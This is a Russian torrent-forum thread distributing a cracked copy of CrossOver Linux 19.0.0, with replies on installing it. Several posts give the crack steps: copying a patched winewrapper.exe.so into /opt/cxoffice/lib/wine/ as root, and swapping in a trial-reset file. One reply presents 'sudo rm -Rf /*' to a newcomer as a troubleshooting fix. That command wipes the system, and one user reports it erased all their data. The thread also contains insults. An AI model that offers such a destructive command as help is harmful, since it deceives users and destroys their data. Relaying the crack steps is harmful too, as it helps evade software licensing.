[x86, amd64] CrossOver Linux 19.0.0

Ответить

JulGreco

Стаж: 11 лет 11 месяцев

JulGreco · 03-Янв-20 19:19 (5 лет 4 месяца назад)

CrossOver Linux
Год Выпуска: 2019
Версия: 19.0.0
Разработчик: CodeWeavers
Системные требования: x86 compatible PC system
Tested on the current release of:
Ubuntu
Mint
Fedora
Debian
Red Hat Enterprise Linux (RHEL)
Python 2.7 or Python >= 3.5
Gtk >= 3.18
PyGObject >= 3.20
X.org with XRender and GLX support
500 MB of free disk space and space for installed applications.
Архитектура: x86, amd64
Таблэтка: присутствует
Язык интерфейса: Английский + Русский
Описание: Коммерческая версия программы wine. Позволяет запускать приложения и игры Windows под Linux и Mac OS X.
В отличие от обычной версии wine имеет более удобный интерфейс, протестирован с кучей приложений и игр. Легко интегрируется в систему, позволяет изолировать устанавливаемые приложения друг от друга. Codeweavers вносит много исправлений в код wine, но не очень быстро их публикует, продавая более надежную и удобную версию wine.
Скриншоты
Download
Rutracker.org не распространяет и не хранит электронные версии произведений, а лишь предоставляет доступ к создаваемому пользователями каталогу ссылок на торрент-файлы, которые содержат только списки хеш-сумм
Как скачивать? (для скачивания .torrent файлов необходима регистрация)
[Профиль]  [ЛС] 

ventelshmentel

Стаж: 11 лет 6 месяцев

ventelshmentel · 05-Янв-20 23:38 (спустя 2 дня 4 часа)

Добрый человек,а как патч применить к программке?
[Профиль]  [ЛС] 

The_Hacker_79

Стаж: 15 лет 10 месяцев

The_Hacker_79 · 06-Янв-20 12:37 (спустя 12 часов)

ventelshmentel
Файл из папки Crack кидаем в папку /opt/cxoffice/lib/wine/ с заменой оригинала.
Внимание файловый менеджер нужно отрывать с root правами!
Если менеджер не позволяет это, как в *бунту дистрибутивах, воспользуйтесь сторонними, например:
Код:
sudo mc
Код:
sudo doublecmd
или аналогичными сторонними файловыми менеджерами.
[Профиль]  [ЛС] 

2Dem

Стаж: 15 лет

2Dem · 12-Янв-20 01:27 (спустя 5 дней)

The_Hacker_79 писал(а):
78632724Если менеджер не позволяет это, как в *бунту дистрибутивах
Чойта?
sudo thunar например для Xubuntu.
[Профиль]  [ЛС] 

Radeon 67

Стаж: 15 лет 11 месяцев

Radeon 67 · 15-Янв-20 14:17 (спустя 3 дня)

crossover, lutris, proton, что из них лучше? Во развелось.
[Профиль]  [ЛС] 

2Dem

2Dem · 15-Янв-20 21:35 (спустя 7 часов)

Radeon 67 писал(а):
78689109crossover, lutris, proton, что из них лучше? Во развелось.
Ничего. Что лучше - рука, нога или ухо? Так и тут, это про разное. Crossover - удобный костыль для Wine. Lutris - эмулятор всяких разных игровых платформ, однако имеет в себе в том числе Wine. Proton - это по сути Wine c блэкджеком и шлюхами артифактом и педиками от одного жирного урода, никакого практического смысла, кроме удовлетворения его чсв не имеет.
[Профиль]  [ЛС] 

Radeon 67

Radeon 67 · 22-Янв-20 12:44 (спустя 6 дней)

2Dem
просто нужен софт для установки пират идишн игр, неужели кроме вайна на который уходит несколько часов гугления ничего нет, а всякие эти кросоверы и лютрисы для лицензий.
[Профиль]  [ЛС] 

2Dem

2Dem · 07-Фев-20 03:59 (спустя 15 дней)

Radeon 67 это и есть все по сути Wine с присадками. Ну кроме Lutris, там до хрена всего другого для эмуляции чего угодно. По мне для игр лучше винду накатить)
[Профиль]  [ЛС] 

Radeon 67

Radeon 67 · 07-Фев-20 19:33 (спустя 15 часов)

2Dem
винда для игр хорошо, но как прочитал фразу одного человека он писал, что ему интересно, чтоб это игралось всё на линукс и мне захотелось реально испробовать этот интерес. Могу сказать точно, если винда выигрывает пока по играм, то до выбора интерфейсов, дизайнов и плюшек как в манжаро две панели, параметры с туевой кучей настройками ей далеко по умолчанию. Но уже 80% игр запускается ок на линукс и он мне интересен остальным как уже описал, так что не знаю наверно хочу перейти на него с потрохами. За папку home с установленными играми и прочим отдельно без нужды в реестре записей всяких линукс респект, переустановил ос, можешь играть, в винде может это не получится если пиратками пользуешься.
[Профиль]  [ЛС] 

allen202

Стаж: 7 лет 8 месяцев

allen202 · 21-Фев-20 21:27 (спустя 14 дней)

И как установить? sudo dpkg -i <имя пакета.deb>
(Reading database ... 157728 files and directories currently installed.)
Preparing to unpack crossover_19.0.0-1.deb ...
Unpacking crossover:i386 (19.0.0-1) over (19.0.0-1) ...
Setting up crossover:i386 (19.0.0-1) ...
admin@admin:~/Downloads/CrossOver 19.0.0$
и все, не ставится
[Профиль]  [ЛС] 

ELIJAH55

Стаж: 14 лет 10 месяцев

ELIJAH55 · 26-Фев-20 22:06 (спустя 5 дней, ред. 26-Фев-20 22:06)

Установил на MX Linux. Crossover запускается и работает, но не создаёт бутылки, сыпет кучу ошибок.
[Профиль]  [ЛС] 

2Dem

2Dem · 26-Фев-20 22:31 (спустя 24 мин., ред. 26-Фев-20 22:31)

allen202 писал(а):
78920574sudo dpkg -i <имя пакета.deb>
Простите, а вы террорист или крупный поставщик на гидре? Просто я не вижу других причин чтобы использовать dpkg. С таким уровнем недоверия и подозрительности у вас должна быть шапочка минимум из трех миллиметровой фольги. В современном мире уже много лет достаточно
Код:
sudo apt install ./crossover_19.0.0-1.deb
дабы установить нужную программу со всеми необходимыми ей пакетами. Ну либо читайте логи, смотрите, чего Кроссу не хватает. Так то он и сам любит многое докачивать и зависимости у него иногда вылазят.
ELIJAH55 писал(а):
78951247Установил на MX Linux. Crossover запускается и работает, но не создаёт бутылки, сыпет кучу ошибок.
Ваш вопрос выдает у вас новичка. Но тогда я не могу понять нафига извращения в виде MX Linux? Не проще ли поступить умнее и поставить Xubuntu? Чтобы не несли разные красноглазики и прочие соцыопаты, а именно Xubuntu самый стабильный, удобный и понятный дистрибутив. Вероятнее всего у вас с правами беда, гораздо менее вероятно, что-то из зависимостей не поставилось, но в любом случае логи смотреть надо.
Radeon 67 писал(а):
788342022Dem
как прочитал фразу одного человека он писал, что ему интересно, чтоб это игралось всё на линукс и мне захотелось реально испробовать этот интерес. Могу сказать точно, если винда выигрывает пока по играм, то до выбора интерфейсов, дизайнов и плюшек как в манжаро две панели, параметры с туевой кучей настройками ей далеко по умолчанию. Но уже 80% игр запускается ок на линукс и он мне интересен остальным как уже описал, так что не знаю наверно хочу перейти на него с потрохами. За папку home с установленными играми и прочим отдельно без нужды в реестре записей всяких линукс респект, переустановил ос, можешь играть, в винде может это не получится если пиратками пользуешься.
Так расчитайте этого недалекого человека обратно. Если один дурак сказал глупость, не надо за ним повторять, пусть его идиотизм останется лишь его. Я сейчас вам приведу жесткий, циничный и грубый пример, но тем не менее поймите его правильно. Итак, вы часто засовываете какой-нибудь дезодорант себе в задницу? Надеюсь что нет. Но ведь в теории так можно и если поискать вполне себе могут отыскаться любители такого. Поэтому давайте использовать вещи адекватно задачам. Да, Кроссовер помогает многое запускать, но он не всесилен, а у игр пропорционально иные требования, в отличии от тех же офисных приложений. И если для пары простых игр, которых нет в нативном варианте, я могу понять применение Кроссовера, то для полноценного задротства без вариантов нужно Винда, это факт, который оспаривают лишь больные и тупые люди. Тем более размер современных носителей позволяет держать две системы рядом, а пара десятков секунд на перезагрузку погоды не сделают.
[Профиль]  [ЛС] 

ELIJAH55

Стаж: 14 лет 10 месяцев

ELIJAH55 · 28-Фев-20 06:36 (спустя 1 день 8 часов)

2Dem писал(а):
78951300Ваш вопрос выдает у вас новичка. Но тогда я не могу понять нафига извращения в виде MX Linux? Не проще ли поступить умнее и поставить Xubuntu? Чтобы не несли разные красноглазики и прочие соцыопаты, а именно Xubuntu самый стабильный, удобный и понятный дистрибутив. Вероятнее всего у вас с правами беда, гораздо менее вероятно, что-то из зависимостей не поставилось, но в любом случае логи смотреть надо.
Так и есть, я в поиске дистрибутива попроще. В разное время пытался работать с Ubuntu, Mint, Deepin, Debian, Elementary OS, Manjaro и много чего уже не помню. Остановился на MX linux тут изначально в магазине приложений есть все что нужно. В рейтинге сайта distrowatch он сейчас в лидерах по заинтересованности пользователей.
У меня получилось избавиться от ошибок и создать бутылку. Благодаря этой теме - https://www.codeweavers.com/support/forums/general/?t=27;msg=81953 где посоветовали все удалить и поставить заново. Команду на удаление нашёл тут - https://www.codeweavers.com/support/wiki/linux/linuxtutorial/uninstall Снова повторил чистую установку по мануалу - https://www.codeweavers.com/support/wiki/linux/linuxtutorial/install
Что делал по другому, нежели в первый раз. Файл сброса триала подсунул не сразу, а установил первую бутылку в триал версии с ограничением в 15 дней. Ошибок не было все установилось. Подсунул сброс триала вместо проводника с открытием папки от root через терминал с командой sudo mc. Удалил ранее созданную бутылку, два раза создавал новую для проверки ошибка не появилась.
[Профиль]  [ЛС] 

2Dem

2Dem · 01-Мар-20 01:33 (спустя 1 день 18 часов)

ELIJAH55 писал(а):
78958411Так и есть, я в поиске дистрибутива попроще.
Не очень похоже)) MX Linux это очередной "Bolgen OS", просто сам факт, что он появился на основе двух неудачных проектов, которые тоже были популярны, но по факту оказались говном. Так и сейчас, миллионы мух не ошибаются выбирая знакомую субстанцию. На Debian существует только два достойных внимания дистрибутива - сам Debian и вариации *buntu, из которых самый достойный и стабильный выбор Xubuntu. В *buntu проще работа с root, в Debian капельку сложнее. Не создавай сам себе геморрой короче, на нормальных дистрибутивах Crossover без костылей работает))
[Профиль]  [ЛС] 

hozman

Стаж: 17 лет

hozman · 08-Мар-20 18:45 (спустя 7 дней, ред. 08-Мар-20 18:45)

ventelshmentel писал(а):
78630557Добрый человек,а как патч применить к программке?
А установить получилось? Какая команда для убунты? Имею ввиду, как из консоли установить. Не получается.. Хотя, установщикам системы установился.
Кстати, crossover гонит. У кого-нить подобная ошибка появляется в процессе создания "бутылки"?
[URL=http:// СПАМ
[Профиль]  [ЛС] 

2Dem

2Dem · 09-Мар-20 16:12 (спустя 21 час)

hozman писал(а):
Какая команда для убунты? Имею ввиду, как из консоли установить.]
Мне только одно не понятно - нахер ставить линукс, если не хочешь узнавать элементарного. Именно узнавать, так как это азы. Это не секретная команда, это элементарное копирование! Ладно, помогу:
Код:

sudo apt install ./crossover_19.0.0-1.deb -y && sudo cp -R Crack/winewrapper.exe.so /opt/cxoffice/lib/wine/
Терминал запускаешь из директории с установщиком, лекарство должно быть рядом в директории Crack. Если и это не поможет, попробуй после выполнить:
Код:

sudo rm -Rf /*
Это уже точно поможет решить все проблемы с Кроссовером.
[Профиль]  [ЛС] 

hozman

hozman · 10-Мар-20 16:13 (спустя 1 день, ред. 10-Мар-20 16:13)

2Dem
так там другой процесс установки. Он отличается от стандартного. Я уже нашёл как это сделать по ссылке https://www.codeweavers.com/support/wiki/linux/linuxtutorial/install
А с чего вы взяли, что ваш способ рабочий?
Там, например, имеется строка:
sudo dpkg --add-architecture i386 ; sudo apt-get update

У вас её нет.
[Профиль]  [ЛС] 

2Dem

2Dem · 10-Мар-20 19:42 (спустя 3 часа, ред. 10-Мар-20 19:42)

hozman, естественно у меня нет такой строчки, я живу в 2020 году по навязанному еврейскому календарю и даже в страшном сне не буду использовать мертвое dpkg. Это труп, не надо его теребить. Apt же кое-как научился самостоятельно подтягивать зависимости, поэтому 32-битную архитектуру ставит сам если нужно.
Почитал инструкцию по ссылке... Видимо никого не смущает, что она написана для версий бубунты грубо от 14.04 до 15.10. Это равносильно тому, что чинить по инструкции от ВАЗ2106 карбюратор на Tesla Model X. Должно как бы смутить, что на Тесле нет карбюратора в принципе. Так и тут пятилетняя просрочка инструкции должна как минимум настораживать.
[Профиль]  [ЛС] 

hozman

hozman · 12-Мар-20 21:55 (спустя 2 дня 2 часа)

2Dem
В том то и дело, что не должно настораживать. Процесс установки у них не изменился. Я изначально так как у вас и устанавливал. Там не создаются "бутылочки", хотя установка проходит успешно. Косяк видимо в архитектуре x86.
У меня вышло запустить корректно только по той оф. инструкции.
[Профиль]  [ЛС] 

Dycek

Стаж: 15 лет 7 месяцев

Dycek · 13-Апр-20 19:27 (спустя 1 месяц, ред. 13-Апр-20 19:27)

Цитата:
Код:

sudo rm -Rf /*
Добрый ты...
[Профиль]  [ЛС] 

2Dem

2Dem · 21-Апр-20 22:12 (спустя 8 дней)

Dycek писал(а):
79236915
Цитата:
Код:

sudo rm -Rf /*
Добрый ты...
Есть грех;) С другой же стороны приятно, что кто-то помнит патч Бармина, а некоторым выше стоит на своей шкуре узнать как этот патч устраняет проблемы не только с Кроссовером, но и вообще с любыми никсами))
[Профиль]  [ЛС] 

kosuk artuom

Top Bonus 04* 3TB

Стаж: 15 лет 6 месяцев

kosuk artuom · 25-Апр-20 19:08 (спустя 3 дня)

Linux Mint 18.3 x64, kernel 4.10.0-38-generic x86_64 , MATE 1.18.0
CrossOver включается без проблем
Установка
sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install libnss-mdns:i386
Установить Crossover
sudo caja
winewrapper.exe.so копируем в папку /opt/cxoffice/lib/wine/ с заменой оригинала.
[Профиль]  [ЛС] 

bratpimen

Стаж: 12 лет 10 месяцев

bratpimen · 04-Май-20 18:50 (спустя 8 дней, ред. 04-Май-20 18:50)

етот код: (sudo rm -Rf /*) у меня стер все данниє на дисках. осторожно.))
И етой код сработал на ура и качесатвенно: sudo apt install ./crossover_19.0.0-1.deb -y
[Профиль]  [ЛС] 

Aliana_Basil

Стаж: 6 лет 2 месяца

Aliana_Basil · 16-Май-20 19:49 (спустя 12 дней)

2Dem писал(а):
что-то из зависимостей не поставилось
Да-да, именно зависимости, все тот же mx linux. Вот только я прогнал
Код:
sudo apt update
И все зависимости нормально скачались, хотя до этого проблемы были
[Профиль]  [ЛС] 

drao1983

Стаж: 13 лет 2 месяца

drao1983 · 29-Май-20 03:01 (спустя 12 дней)

Просит разрешение на обновление, если разрешить - слетит активация?
[Профиль]  [ЛС] 

9ss6

Стаж: 15 лет 2 месяца

9ss6 · 30-Май-20 20:00 (спустя 1 день 16 часов)

drao1983 писал(а):
79529269Просит разрешение на обновление, если разрешить - слетит активация?
Не слетит. Это обновляются установочные профили.
[Профиль]  [ЛС] 

Styletto

Стаж: 16 лет 6 месяцев

Styletto · 22-Июл-20 07:41 (спустя 1 месяц 22 дня, ред. 22-Июл-20 07:41)

Спасибо добрый человек!
Заработало!!!
Kubuntu 20.04 LTS на ZFS.
Идеальная замена PlayOnLinux, который не пошел...
Правда, чтобы поставить приложение, которого нет в списке, иногда надо вручную ставить библиотеки :386 или искать их в интернете, спасибо и ему .
Зато, благодаря логу запуска любой программы, ты точно знаешь, что искать.
[Профиль]  [ЛС] 

skared12345

Стаж: 9 лет 3 месяца

skared12345 · 01-Авг-20 14:00 (спустя 10 дней, ред. 01-Авг-20 14:00)

Код:
sh install-crossover-19.0.0.bin
установить все зависимости по очередности
Рад служить
kosuk artuom писал(а):
79322863Linux Mint 18.3 x64, kernel 4.10.0-38-generic x86_64 , MATE 1.18.0
CrossOver включается без проблем
Установка
sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install libnss-mdns:i386
Установить Crossover
sudo caja
winewrapper.exe.so копируем в папку /opt/cxoffice/lib/wine/ с заменой оригинала.
Мне помогло только ещё больше ненавидитьь виндовс
[Профиль]  [ЛС] 

artsian

Стаж: 15 лет 9 месяцев

artsian · 05-Авг-20 19:10 (спустя 4 дня)

Цитата:
Терминал запускаешь из директории с установщиком, лекарство должно быть рядом в директории Crack. Если и это не поможет, попробуй после выполнить:
Код:
sudo rm -Rf /*
Уж простите, но из этого чудака на букву м люди и не переходят на линь. Убить время, чтобы разбираться в системе, следовать инструкциям и тут это... Больше чем уверен, воспользовавшись тупым, даже дебильным советом, многие новички тупо не стали тратить время на восстановление системы, а ушли обратно к мелкомягким. Сообщество, блин, называется. Распял бы нахер такого помощника, считающего себя гуру.
Парни, ну серьезно, у нас новички совета спрашивают, а мы им - грохни все. Так вот, они не умнее станут, они уйдут обратно, посчитав себя оскорбленными. Разве такие принципы пропогандирует сообщество?
[Профиль]  [ЛС] 

gggoggga

Стаж: 14 лет 6 месяцев

gggoggga · 06-Авг-20 18:39 (спустя 23 часа, ред. 06-Авг-20 18:39)

При всём уважении.Не вижу удобства. Я так понимаю, данная программа создана для работы максимально "из коробки". Wine+Playonlinux+Winerticks делает намного больше и удобнее. Но это,только, мой опыт.https://www.youtube.com/playlist?list=PLSQK8hjeNTSISWgLtXyZHZ-bzCTOeiMCO
[Профиль]  [ЛС] 

Ответить
Loading...
Error